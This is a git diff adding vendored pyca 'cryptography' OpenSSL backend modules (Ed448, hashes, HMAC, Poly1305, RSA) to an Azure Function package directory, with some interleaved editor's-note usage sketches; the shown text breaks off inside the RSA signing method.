evp_pkey + + def public_key(self) -> Ed448PublicKey: + buf = self._backend._ffi.new("unsigned char []", _ED448_KEY_SIZE) + buflen = self._backend._ffi.new("size_t *", _ED448_KEY_SIZE) + res = self._backend._lib.EVP_PKEY_get_raw_public_key( + self._evp_pkey, buf, buflen + ) + self._backend.openssl_assert(res == 1) + self._backend.openssl_assert(buflen[0] == _ED448_KEY_SIZE) + public_bytes = self._backend._ffi.buffer(buf)[:] + return self._backend.ed448_load_public_bytes(public_bytes) + + def sign(self, data: bytes) -> bytes: + evp_md_ctx = self._backend._lib.EVP_MD_CTX_new() + self._backend.openssl_assert(evp_md_ctx != self._backend._ffi.NULL) + evp_md_ctx = self._backend._ffi.gc( + evp_md_ctx, self._backend._lib.EVP_MD_CTX_free + ) + res = self._backend._lib.EVP_DigestSignInit( + evp_md_ctx, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + self._evp_pkey, + ) + self._backend.openssl_assert(res == 1) + buf = self._backend._ffi.new("unsigned char[]", _ED448_SIG_SIZE) + buflen = self._backend._ffi.new("size_t *", len(buf)) + res = self._backend._lib.EVP_DigestSign( + evp_md_ctx, buf, buflen, data, len(data) + ) + self._backend.openssl_assert(res == 1) + self._backend.openssl_assert(buflen[0] == _ED448_SIG_SIZE) + return 
self._backend._ffi.buffer(buf, buflen[0])[:] + + def private_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PrivateFormat, + encryption_algorithm: serialization.KeySerializationEncryption, + ) -> bytes: + if ( + encoding is serialization.Encoding.Raw + or format is serialization.PublicFormat.Raw + ): + if ( + format is not serialization.PrivateFormat.Raw + or encoding is not serialization.Encoding.Raw + or not isinstance( + encryption_algorithm, serialization.NoEncryption + ) + ): + raise ValueError( + "When using Raw both encoding and format must be Raw " + "and encryption_algorithm must be NoEncryption()" + ) + + return self._raw_private_bytes() + + return self._backend._private_key_bytes( + encoding, format, encryption_algorithm, self, self._evp_pkey, None + ) + + def _raw_private_bytes(self) -> bytes: + buf = self._backend._ffi.new("unsigned char []", _ED448_KEY_SIZE) + buflen = self._backend._ffi.new("size_t *", _ED448_KEY_SIZE) + res = self._backend._lib.EVP_PKEY_get_raw_private_key( + self._evp_pkey, buf, buflen + ) + self._backend.openssl_assert(res == 1) + self._backend.openssl_assert(buflen[0] == _ED448_KEY_SIZE) + return self._backend._ffi.buffer(buf, _ED448_KEY_SIZE)[:] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/encode_asn1.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/encode_asn1.py new file mode 100644 index 0000000..21187fd --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/encode_asn1.py @@ -0,0 +1,18 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +from cryptography import x509 + + +_CRLREASONFLAGS = { + x509.ReasonFlags.key_compromise: 1, + x509.ReasonFlags.ca_compromise: 2, + x509.ReasonFlags.affiliation_changed: 3, + x509.ReasonFlags.superseded: 4, + x509.ReasonFlags.cessation_of_operation: 5, + x509.ReasonFlags.certificate_hold: 6, + x509.ReasonFlags.privilege_withdrawn: 7, + x509.ReasonFlags.aa_compromise: 8, +} diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/hashes.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/hashes.py new file mode 100644 index 0000000..e53182a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/hashes.py @@ -0,0 +1,87 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
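# ---------------------------------------------------------------------------
# [editor's note: illustrative sketch, not part of the vendored files]
# The _Ed448PublicKey/_Ed448PrivateKey wrappers earlier in this patch are
# normally reached through the library's public API. A minimal sign/verify
# round trip, assuming an OpenSSL build with Ed448 support:

from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric.ed448 import Ed448PrivateKey

ed448_key = Ed448PrivateKey.generate()
ed448_sig = ed448_key.sign(b"message")  # 114 bytes (_ED448_SIG_SIZE)
# verify() raises cryptography.exceptions.InvalidSignature on mismatch:
ed448_key.public_key().verify(ed448_sig, b"message")

raw_public = ed448_key.public_key().public_bytes(
    serialization.Encoding.Raw, serialization.PublicFormat.Raw
)
assert len(raw_public) == 57  # _ED448_KEY_SIZE
# ---------------------------------------------------------------------------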
+ +import typing + +from cryptography.exceptions import UnsupportedAlgorithm, _Reasons +from cryptography.hazmat.primitives import hashes + + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.backend import Backend + + +class _HashContext(hashes.HashContext): + def __init__( + self, backend: "Backend", algorithm: hashes.HashAlgorithm, ctx=None + ) -> None: + self._algorithm = algorithm + + self._backend = backend + + if ctx is None: + ctx = self._backend._lib.EVP_MD_CTX_new() + ctx = self._backend._ffi.gc( + ctx, self._backend._lib.EVP_MD_CTX_free + ) + evp_md = self._backend._evp_md_from_algorithm(algorithm) + if evp_md == self._backend._ffi.NULL: + raise UnsupportedAlgorithm( + "{} is not a supported hash on this backend.".format( + algorithm.name + ), + _Reasons.UNSUPPORTED_HASH, + ) + res = self._backend._lib.EVP_DigestInit_ex( + ctx, evp_md, self._backend._ffi.NULL + ) + self._backend.openssl_assert(res != 0) + + self._ctx = ctx + + @property + def algorithm(self) -> hashes.HashAlgorithm: + return self._algorithm + + def copy(self) -> "_HashContext": + copied_ctx = self._backend._lib.EVP_MD_CTX_new() + copied_ctx = self._backend._ffi.gc( + copied_ctx, self._backend._lib.EVP_MD_CTX_free + ) + res = self._backend._lib.EVP_MD_CTX_copy_ex(copied_ctx, self._ctx) + self._backend.openssl_assert(res != 0) + return _HashContext(self._backend, self.algorithm, ctx=copied_ctx) + + def update(self, data: bytes) -> None: + data_ptr = self._backend._ffi.from_buffer(data) + res = self._backend._lib.EVP_DigestUpdate( + self._ctx, data_ptr, len(data) + ) + self._backend.openssl_assert(res != 0) + + def finalize(self) -> bytes: + if isinstance(self.algorithm, hashes.ExtendableOutputFunction): + # extendable output functions use a different finalize + return self._finalize_xof() + else: + buf = self._backend._ffi.new( + "unsigned char[]", self._backend._lib.EVP_MAX_MD_SIZE + ) + outlen = self._backend._ffi.new("unsigned int *") + res = self._backend._lib.EVP_DigestFinal_ex(self._ctx, buf, outlen) + self._backend.openssl_assert(res != 0) + self._backend.openssl_assert( + outlen[0] == self.algorithm.digest_size + ) + return self._backend._ffi.buffer(buf)[: outlen[0]] + + def _finalize_xof(self) -> bytes: + buf = self._backend._ffi.new( + "unsigned char[]", self.algorithm.digest_size + ) + res = self._backend._lib.EVP_DigestFinalXOF( + self._ctx, buf, self.algorithm.digest_size + ) + self._backend.openssl_assert(res != 0) + return self._backend._ffi.buffer(buf)[: self.algorithm.digest_size] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/hmac.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/hmac.py new file mode 100644 index 0000000..2427395 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/hmac.py @@ -0,0 +1,85 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
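# ---------------------------------------------------------------------------
# [editor's note: illustrative sketch, not part of the vendored files]
# The _HashContext above backs the public hashes.Hash object: copy()
# duplicates the underlying EVP_MD_CTX via EVP_MD_CTX_copy_ex, and SHAKE
# digests exercise the EVP_DigestFinalXOF path in _finalize_xof():

from cryptography.hazmat.primitives import hashes

ctx = hashes.Hash(hashes.SHA256())
ctx.update(b"hello ")
fork = ctx.copy()            # independent context sharing the state so far
ctx.update(b"world")
fork.update(b"there")
print(ctx.finalize().hex())
print(fork.finalize().hex())

xof = hashes.Hash(hashes.SHAKE256(digest_size=64))  # extendable-output function
xof.update(b"data")
assert len(xof.finalize()) == 64
# ---------------------------------------------------------------------------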
+ +import typing + +from cryptography.exceptions import ( + InvalidSignature, + UnsupportedAlgorithm, + _Reasons, +) +from cryptography.hazmat.primitives import constant_time, hashes + + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.backend import Backend + + +class _HMACContext(hashes.HashContext): + def __init__( + self, + backend: "Backend", + key: bytes, + algorithm: hashes.HashAlgorithm, + ctx=None, + ): + self._algorithm = algorithm + self._backend = backend + + if ctx is None: + ctx = self._backend._lib.HMAC_CTX_new() + self._backend.openssl_assert(ctx != self._backend._ffi.NULL) + ctx = self._backend._ffi.gc(ctx, self._backend._lib.HMAC_CTX_free) + evp_md = self._backend._evp_md_from_algorithm(algorithm) + if evp_md == self._backend._ffi.NULL: + raise UnsupportedAlgorithm( + "{} is not a supported hash on this backend".format( + algorithm.name + ), + _Reasons.UNSUPPORTED_HASH, + ) + key_ptr = self._backend._ffi.from_buffer(key) + res = self._backend._lib.HMAC_Init_ex( + ctx, key_ptr, len(key), evp_md, self._backend._ffi.NULL + ) + self._backend.openssl_assert(res != 0) + + self._ctx = ctx + self._key = key + + @property + def algorithm(self) -> hashes.HashAlgorithm: + return self._algorithm + + def copy(self) -> "_HMACContext": + copied_ctx = self._backend._lib.HMAC_CTX_new() + self._backend.openssl_assert(copied_ctx != self._backend._ffi.NULL) + copied_ctx = self._backend._ffi.gc( + copied_ctx, self._backend._lib.HMAC_CTX_free + ) + res = self._backend._lib.HMAC_CTX_copy(copied_ctx, self._ctx) + self._backend.openssl_assert(res != 0) + return _HMACContext( + self._backend, self._key, self.algorithm, ctx=copied_ctx + ) + + def update(self, data: bytes) -> None: + data_ptr = self._backend._ffi.from_buffer(data) + res = self._backend._lib.HMAC_Update(self._ctx, data_ptr, len(data)) + self._backend.openssl_assert(res != 0) + + def finalize(self) -> bytes: + buf = self._backend._ffi.new( + "unsigned char[]", self._backend._lib.EVP_MAX_MD_SIZE + ) + outlen = self._backend._ffi.new("unsigned int *") + res = self._backend._lib.HMAC_Final(self._ctx, buf, outlen) + self._backend.openssl_assert(res != 0) + self._backend.openssl_assert(outlen[0] == self.algorithm.digest_size) + return self._backend._ffi.buffer(buf)[: outlen[0]] + + def verify(self, signature: bytes) -> None: + digest = self.finalize() + if not constant_time.bytes_eq(digest, signature): + raise InvalidSignature("Signature did not match digest.") diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/poly1305.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/poly1305.py new file mode 100644 index 0000000..6673c5f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/poly1305.py @@ -0,0 +1,68 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
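# ---------------------------------------------------------------------------
# [editor's note: illustrative sketch, not part of the vendored files]
# The _HMACContext above is driven through the public hmac.HMAC object;
# verify() uses the constant_time.bytes_eq comparison shown in the code:

from cryptography.hazmat.primitives import hashes, hmac

mac = hmac.HMAC(b"secret-key", hashes.SHA256())
mac.update(b"payload")
tag = mac.finalize()

check = hmac.HMAC(b"secret-key", hashes.SHA256())
check.update(b"payload")
check.verify(tag)  # raises InvalidSignature if the tag does not match
# ---------------------------------------------------------------------------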
+ +import typing + +from cryptography.exceptions import InvalidSignature +from cryptography.hazmat.primitives import constant_time + + +_POLY1305_TAG_SIZE = 16 +_POLY1305_KEY_SIZE = 32 + + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.backend import Backend + + +class _Poly1305Context: + def __init__(self, backend: "Backend", key: bytes) -> None: + self._backend = backend + + key_ptr = self._backend._ffi.from_buffer(key) + # This function copies the key into OpenSSL-owned memory so we don't + # need to retain it ourselves + evp_pkey = self._backend._lib.EVP_PKEY_new_raw_private_key( + self._backend._lib.NID_poly1305, + self._backend._ffi.NULL, + key_ptr, + len(key), + ) + self._backend.openssl_assert(evp_pkey != self._backend._ffi.NULL) + self._evp_pkey = self._backend._ffi.gc( + evp_pkey, self._backend._lib.EVP_PKEY_free + ) + ctx = self._backend._lib.EVP_MD_CTX_new() + self._backend.openssl_assert(ctx != self._backend._ffi.NULL) + self._ctx = self._backend._ffi.gc( + ctx, self._backend._lib.EVP_MD_CTX_free + ) + res = self._backend._lib.EVP_DigestSignInit( + self._ctx, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + self._evp_pkey, + ) + self._backend.openssl_assert(res == 1) + + def update(self, data: bytes) -> None: + data_ptr = self._backend._ffi.from_buffer(data) + res = self._backend._lib.EVP_DigestSignUpdate( + self._ctx, data_ptr, len(data) + ) + self._backend.openssl_assert(res != 0) + + def finalize(self) -> bytes: + buf = self._backend._ffi.new("unsigned char[]", _POLY1305_TAG_SIZE) + outlen = self._backend._ffi.new("size_t *", _POLY1305_TAG_SIZE) + res = self._backend._lib.EVP_DigestSignFinal(self._ctx, buf, outlen) + self._backend.openssl_assert(res != 0) + self._backend.openssl_assert(outlen[0] == _POLY1305_TAG_SIZE) + return self._backend._ffi.buffer(buf)[: outlen[0]] + + def verify(self, tag: bytes) -> None: + mac = self.finalize() + if not constant_time.bytes_eq(mac, tag): + raise InvalidSignature("Value did not match computed tag.") diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/rsa.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/rsa.py new file mode 100644 index 0000000..fe2434b --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/rsa.py @@ -0,0 +1,567 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
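# ---------------------------------------------------------------------------
# [editor's note: illustrative sketch, not part of the vendored files]
# _Poly1305Context above is exposed as the public Poly1305 one-time
# authenticator. Note that a Poly1305 key must never be reused across
# messages:

import os
from cryptography.hazmat.primitives.poly1305 import Poly1305

one_time_key = os.urandom(32)   # _POLY1305_KEY_SIZE
p = Poly1305(one_time_key)
p.update(b"message")
p_tag = p.finalize()            # 16 bytes (_POLY1305_TAG_SIZE)

p_check = Poly1305(one_time_key)
p_check.update(b"message")
p_check.verify(p_tag)           # raises InvalidSignature on mismatch
# ---------------------------------------------------------------------------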
+ + +import typing + +from cryptography.exceptions import ( + InvalidSignature, + UnsupportedAlgorithm, + _Reasons, +) +from cryptography.hazmat.backends.openssl.utils import ( + _calculate_digest_and_algorithm, +) +from cryptography.hazmat.primitives import hashes, serialization +from cryptography.hazmat.primitives.asymmetric import ( + utils as asym_utils, +) +from cryptography.hazmat.primitives.asymmetric.padding import ( + AsymmetricPadding, + MGF1, + OAEP, + PKCS1v15, + PSS, + _Auto, + _DigestLength, + _MaxLength, + calculate_max_pss_salt_length, +) +from cryptography.hazmat.primitives.asymmetric.rsa import ( + RSAPrivateKey, + RSAPrivateNumbers, + RSAPublicKey, + RSAPublicNumbers, +) + + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.backend import Backend + + +def _get_rsa_pss_salt_length( + backend: "Backend", + pss: PSS, + key: typing.Union[RSAPrivateKey, RSAPublicKey], + hash_algorithm: hashes.HashAlgorithm, +) -> int: + salt = pss._salt_length + + if isinstance(salt, _MaxLength): + return calculate_max_pss_salt_length(key, hash_algorithm) + elif isinstance(salt, _DigestLength): + return hash_algorithm.digest_size + elif isinstance(salt, _Auto): + if isinstance(key, RSAPrivateKey): + raise ValueError( + "PSS salt length can only be set to AUTO when verifying" + ) + return backend._lib.RSA_PSS_SALTLEN_AUTO + else: + return salt + + +def _enc_dec_rsa( + backend: "Backend", + key: typing.Union["_RSAPrivateKey", "_RSAPublicKey"], + data: bytes, + padding: AsymmetricPadding, +) -> bytes: + if not isinstance(padding, AsymmetricPadding): + raise TypeError("Padding must be an instance of AsymmetricPadding.") + + if isinstance(padding, PKCS1v15): + padding_enum = backend._lib.RSA_PKCS1_PADDING + elif isinstance(padding, OAEP): + padding_enum = backend._lib.RSA_PKCS1_OAEP_PADDING + + if not isinstance(padding._mgf, MGF1): + raise UnsupportedAlgorithm( + "Only MGF1 is supported by this backend.", + _Reasons.UNSUPPORTED_MGF, + ) + + if not backend.rsa_padding_supported(padding): + raise UnsupportedAlgorithm( + "This combination of padding and hash algorithm is not " + "supported by this backend.", + _Reasons.UNSUPPORTED_PADDING, + ) + + else: + raise UnsupportedAlgorithm( + "{} is not supported by this backend.".format(padding.name), + _Reasons.UNSUPPORTED_PADDING, + ) + + return _enc_dec_rsa_pkey_ctx(backend, key, data, padding_enum, padding) + + +def _enc_dec_rsa_pkey_ctx( + backend: "Backend", + key: typing.Union["_RSAPrivateKey", "_RSAPublicKey"], + data: bytes, + padding_enum: int, + padding: AsymmetricPadding, +) -> bytes: + init: typing.Callable[[typing.Any], int] + crypt: typing.Callable[[typing.Any, typing.Any, int, bytes, int], int] + if isinstance(key, _RSAPublicKey): + init = backend._lib.EVP_PKEY_encrypt_init + crypt = backend._lib.EVP_PKEY_encrypt + else: + init = backend._lib.EVP_PKEY_decrypt_init + crypt = backend._lib.EVP_PKEY_decrypt + + pkey_ctx = backend._lib.EVP_PKEY_CTX_new(key._evp_pkey, backend._ffi.NULL) + backend.openssl_assert(pkey_ctx != backend._ffi.NULL) + pkey_ctx = backend._ffi.gc(pkey_ctx, backend._lib.EVP_PKEY_CTX_free) + res = init(pkey_ctx) + backend.openssl_assert(res == 1) + res = backend._lib.EVP_PKEY_CTX_set_rsa_padding(pkey_ctx, padding_enum) + backend.openssl_assert(res > 0) + buf_size = backend._lib.EVP_PKEY_size(key._evp_pkey) + backend.openssl_assert(buf_size > 0) + if isinstance(padding, OAEP): + mgf1_md = backend._evp_md_non_null_from_algorithm( + padding._mgf._algorithm + ) + res = 
backend._lib.EVP_PKEY_CTX_set_rsa_mgf1_md(pkey_ctx, mgf1_md) + backend.openssl_assert(res > 0) + oaep_md = backend._evp_md_non_null_from_algorithm(padding._algorithm) + res = backend._lib.EVP_PKEY_CTX_set_rsa_oaep_md(pkey_ctx, oaep_md) + backend.openssl_assert(res > 0) + + if ( + isinstance(padding, OAEP) + and padding._label is not None + and len(padding._label) > 0 + ): + # set0_rsa_oaep_label takes ownership of the char * so we need to + # copy it into some new memory + labelptr = backend._lib.OPENSSL_malloc(len(padding._label)) + backend.openssl_assert(labelptr != backend._ffi.NULL) + backend._ffi.memmove(labelptr, padding._label, len(padding._label)) + res = backend._lib.EVP_PKEY_CTX_set0_rsa_oaep_label( + pkey_ctx, labelptr, len(padding._label) + ) + backend.openssl_assert(res == 1) + + outlen = backend._ffi.new("size_t *", buf_size) + buf = backend._ffi.new("unsigned char[]", buf_size) + # Everything from this line onwards is written with the goal of being as + # constant-time as is practical given the constraints of Python and our + # API. See Bleichenbacher's '98 attack on RSA, and its many many variants. + # As such, you should not attempt to change this (particularly to "clean it + # up") without understanding why it was written this way (see + # Chesterton's Fence), and without measuring to verify you have not + # introduced observable time differences. + res = crypt(pkey_ctx, buf, outlen, data, len(data)) + resbuf = backend._ffi.buffer(buf)[: outlen[0]] + backend._lib.ERR_clear_error() + if res <= 0: + raise ValueError("Encryption/decryption failed.") + return resbuf + + +def _rsa_sig_determine_padding( + backend: "Backend", + key: typing.Union["_RSAPrivateKey", "_RSAPublicKey"], + padding: AsymmetricPadding, + algorithm: typing.Optional[hashes.HashAlgorithm], +) -> int: + if not isinstance(padding, AsymmetricPadding): + raise TypeError("Expected provider of AsymmetricPadding.") + + pkey_size = backend._lib.EVP_PKEY_size(key._evp_pkey) + backend.openssl_assert(pkey_size > 0) + + if isinstance(padding, PKCS1v15): + # Hash algorithm is ignored for PKCS1v15-padding, may be None. + padding_enum = backend._lib.RSA_PKCS1_PADDING + elif isinstance(padding, PSS): + if not isinstance(padding._mgf, MGF1): + raise UnsupportedAlgorithm( + "Only MGF1 is supported by this backend.", + _Reasons.UNSUPPORTED_MGF, + ) + + # PSS padding requires a hash algorithm + if not isinstance(algorithm, hashes.HashAlgorithm): + raise TypeError("Expected instance of hashes.HashAlgorithm.") + + # Size of key in bytes - 2 is the maximum + # PSS signature length (salt length is checked later) + if pkey_size - algorithm.digest_size - 2 < 0: + raise ValueError( + "Digest too large for key size. Use a larger " + "key or different digest." + ) + + padding_enum = backend._lib.RSA_PKCS1_PSS_PADDING + else: + raise UnsupportedAlgorithm( + "{} is not supported by this backend.".format(padding.name), + _Reasons.UNSUPPORTED_PADDING, + ) + + return padding_enum + + +# Hash algorithm can be absent (None) to initialize the context without setting +# any message digest algorithm. This is currently only valid for the PKCS1v15 +# padding type, where it means that the signature data is encoded/decoded +# as provided, without being wrapped in a DigestInfo structure. 
+def _rsa_sig_setup( + backend: "Backend", + padding: AsymmetricPadding, + algorithm: typing.Optional[hashes.HashAlgorithm], + key: typing.Union["_RSAPublicKey", "_RSAPrivateKey"], + init_func: typing.Callable[[typing.Any], int], +): + padding_enum = _rsa_sig_determine_padding(backend, key, padding, algorithm) + pkey_ctx = backend._lib.EVP_PKEY_CTX_new(key._evp_pkey, backend._ffi.NULL) + backend.openssl_assert(pkey_ctx != backend._ffi.NULL) + pkey_ctx = backend._ffi.gc(pkey_ctx, backend._lib.EVP_PKEY_CTX_free) + res = init_func(pkey_ctx) + if res != 1: + errors = backend._consume_errors() + raise ValueError("Unable to sign/verify with this key", errors) + + if algorithm is not None: + evp_md = backend._evp_md_non_null_from_algorithm(algorithm) + res = backend._lib.EVP_PKEY_CTX_set_signature_md(pkey_ctx, evp_md) + if res <= 0: + backend._consume_errors() + raise UnsupportedAlgorithm( + "{} is not supported by this backend for RSA signing.".format( + algorithm.name + ), + _Reasons.UNSUPPORTED_HASH, + ) + res = backend._lib.EVP_PKEY_CTX_set_rsa_padding(pkey_ctx, padding_enum) + if res <= 0: + backend._consume_errors() + raise UnsupportedAlgorithm( + "{} is not supported for the RSA signature operation.".format( + padding.name + ), + _Reasons.UNSUPPORTED_PADDING, + ) + if isinstance(padding, PSS): + assert isinstance(algorithm, hashes.HashAlgorithm) + res = backend._lib.EVP_PKEY_CTX_set_rsa_pss_saltlen( + pkey_ctx, + _get_rsa_pss_salt_length(backend, padding, key, algorithm), + ) + backend.openssl_assert(res > 0) + + mgf1_md = backend._evp_md_non_null_from_algorithm( + padding._mgf._algorithm + ) + res = backend._lib.EVP_PKEY_CTX_set_rsa_mgf1_md(pkey_ctx, mgf1_md) + backend.openssl_assert(res > 0) + + return pkey_ctx + + +def _rsa_sig_sign( + backend: "Backend", + padding: AsymmetricPadding, + algorithm: hashes.HashAlgorithm, + private_key: "_RSAPrivateKey", + data: bytes, +) -> bytes: + pkey_ctx = _rsa_sig_setup( + backend, + padding, + algorithm, + private_key, + backend._lib.EVP_PKEY_sign_init, + ) + buflen = backend._ffi.new("size_t *") + res = backend._lib.EVP_PKEY_sign( + pkey_ctx, backend._ffi.NULL, buflen, data, len(data) + ) + backend.openssl_assert(res == 1) + buf = backend._ffi.new("unsigned char[]", buflen[0]) + res = backend._lib.EVP_PKEY_sign(pkey_ctx, buf, buflen, data, len(data)) + if res != 1: + errors = backend._consume_errors_with_text() + raise ValueError( + "Digest or salt length too long for key size. Use a larger key " + "or shorter salt length if you are specifying a PSS salt", + errors, + ) + + return backend._ffi.buffer(buf)[:] + + +def _rsa_sig_verify( + backend: "Backend", + padding: AsymmetricPadding, + algorithm: hashes.HashAlgorithm, + public_key: "_RSAPublicKey", + signature: bytes, + data: bytes, +) -> None: + pkey_ctx = _rsa_sig_setup( + backend, + padding, + algorithm, + public_key, + backend._lib.EVP_PKEY_verify_init, + ) + res = backend._lib.EVP_PKEY_verify( + pkey_ctx, signature, len(signature), data, len(data) + ) + # The previous call can return negative numbers in the event of an + # error. This is not a signature failure but we need to fail if it + # occurs. 
+ backend.openssl_assert(res >= 0) + if res == 0: + backend._consume_errors() + raise InvalidSignature + + +def _rsa_sig_recover( + backend: "Backend", + padding: AsymmetricPadding, + algorithm: typing.Optional[hashes.HashAlgorithm], + public_key: "_RSAPublicKey", + signature: bytes, +) -> bytes: + pkey_ctx = _rsa_sig_setup( + backend, + padding, + algorithm, + public_key, + backend._lib.EVP_PKEY_verify_recover_init, + ) + + # Attempt to keep the rest of the code in this function as constant/time + # as possible. See the comment in _enc_dec_rsa_pkey_ctx. Note that the + # buflen parameter is used even though its value may be undefined in the + # error case. Due to the tolerant nature of Python slicing this does not + # trigger any exceptions. + maxlen = backend._lib.EVP_PKEY_size(public_key._evp_pkey) + backend.openssl_assert(maxlen > 0) + buf = backend._ffi.new("unsigned char[]", maxlen) + buflen = backend._ffi.new("size_t *", maxlen) + res = backend._lib.EVP_PKEY_verify_recover( + pkey_ctx, buf, buflen, signature, len(signature) + ) + resbuf = backend._ffi.buffer(buf)[: buflen[0]] + backend._lib.ERR_clear_error() + # Assume that all parameter errors are handled during the setup phase and + # any error here is due to invalid signature. + if res != 1: + raise InvalidSignature + return resbuf + + +class _RSAPrivateKey(RSAPrivateKey): + _evp_pkey: object + _rsa_cdata: object + _key_size: int + + def __init__( + self, backend: "Backend", rsa_cdata, evp_pkey, _skip_check_key: bool + ): + res: int + # RSA_check_key is slower in OpenSSL 3.0.0 due to improved + # primality checking. In normal use this is unlikely to be a problem + # since users don't load new keys constantly, but for TESTING we've + # added an init arg that allows skipping the checks. You should not + # use this in production code unless you understand the consequences. + if not _skip_check_key: + res = backend._lib.RSA_check_key(rsa_cdata) + if res != 1: + errors = backend._consume_errors_with_text() + raise ValueError("Invalid private key", errors) + # 2 is prime and passes an RSA key check, so we also check + # if p and q are odd just to be safe. + p = backend._ffi.new("BIGNUM **") + q = backend._ffi.new("BIGNUM **") + backend._lib.RSA_get0_factors(rsa_cdata, p, q) + backend.openssl_assert(p[0] != backend._ffi.NULL) + backend.openssl_assert(q[0] != backend._ffi.NULL) + p_odd = backend._lib.BN_is_odd(p[0]) + q_odd = backend._lib.BN_is_odd(q[0]) + if p_odd != 1 or q_odd != 1: + errors = backend._consume_errors_with_text() + raise ValueError("Invalid private key", errors) + + # Blinding is on by default in many versions of OpenSSL, but let's + # just be conservative here. 
+ res = backend._lib.RSA_blinding_on(rsa_cdata, backend._ffi.NULL) + backend.openssl_assert(res == 1) + + self._backend = backend + self._rsa_cdata = rsa_cdata + self._evp_pkey = evp_pkey + + n = self._backend._ffi.new("BIGNUM **") + self._backend._lib.RSA_get0_key( + self._rsa_cdata, + n, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + ) + self._backend.openssl_assert(n[0] != self._backend._ffi.NULL) + self._key_size = self._backend._lib.BN_num_bits(n[0]) + + @property + def key_size(self) -> int: + return self._key_size + + def decrypt(self, ciphertext: bytes, padding: AsymmetricPadding) -> bytes: + key_size_bytes = (self.key_size + 7) // 8 + if key_size_bytes != len(ciphertext): + raise ValueError("Ciphertext length must be equal to key size.") + + return _enc_dec_rsa(self._backend, self, ciphertext, padding) + + def public_key(self) -> RSAPublicKey: + ctx = self._backend._lib.RSAPublicKey_dup(self._rsa_cdata) + self._backend.openssl_assert(ctx != self._backend._ffi.NULL) + ctx = self._backend._ffi.gc(ctx, self._backend._lib.RSA_free) + evp_pkey = self._backend._rsa_cdata_to_evp_pkey(ctx) + return _RSAPublicKey(self._backend, ctx, evp_pkey) + + def private_numbers(self) -> RSAPrivateNumbers: + n = self._backend._ffi.new("BIGNUM **") + e = self._backend._ffi.new("BIGNUM **") + d = self._backend._ffi.new("BIGNUM **") + p = self._backend._ffi.new("BIGNUM **") + q = self._backend._ffi.new("BIGNUM **") + dmp1 = self._backend._ffi.new("BIGNUM **") + dmq1 = self._backend._ffi.new("BIGNUM **") + iqmp = self._backend._ffi.new("BIGNUM **") + self._backend._lib.RSA_get0_key(self._rsa_cdata, n, e, d) + self._backend.openssl_assert(n[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(e[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(d[0] != self._backend._ffi.NULL) + self._backend._lib.RSA_get0_factors(self._rsa_cdata, p, q) + self._backend.openssl_assert(p[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(q[0] != self._backend._ffi.NULL) + self._backend._lib.RSA_get0_crt_params( + self._rsa_cdata, dmp1, dmq1, iqmp + ) + self._backend.openssl_assert(dmp1[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(dmq1[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(iqmp[0] != self._backend._ffi.NULL) + return RSAPrivateNumbers( + p=self._backend._bn_to_int(p[0]), + q=self._backend._bn_to_int(q[0]), + d=self._backend._bn_to_int(d[0]), + dmp1=self._backend._bn_to_int(dmp1[0]), + dmq1=self._backend._bn_to_int(dmq1[0]), + iqmp=self._backend._bn_to_int(iqmp[0]), + public_numbers=RSAPublicNumbers( + e=self._backend._bn_to_int(e[0]), + n=self._backend._bn_to_int(n[0]), + ), + ) + + def private_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PrivateFormat, + encryption_algorithm: serialization.KeySerializationEncryption, + ) -> bytes: + return self._backend._private_key_bytes( + encoding, + format, + encryption_algorithm, + self, + self._evp_pkey, + self._rsa_cdata, + ) + + def sign( + self, + data: bytes, + padding: AsymmetricPadding, + algorithm: typing.Union[asym_utils.Prehashed, 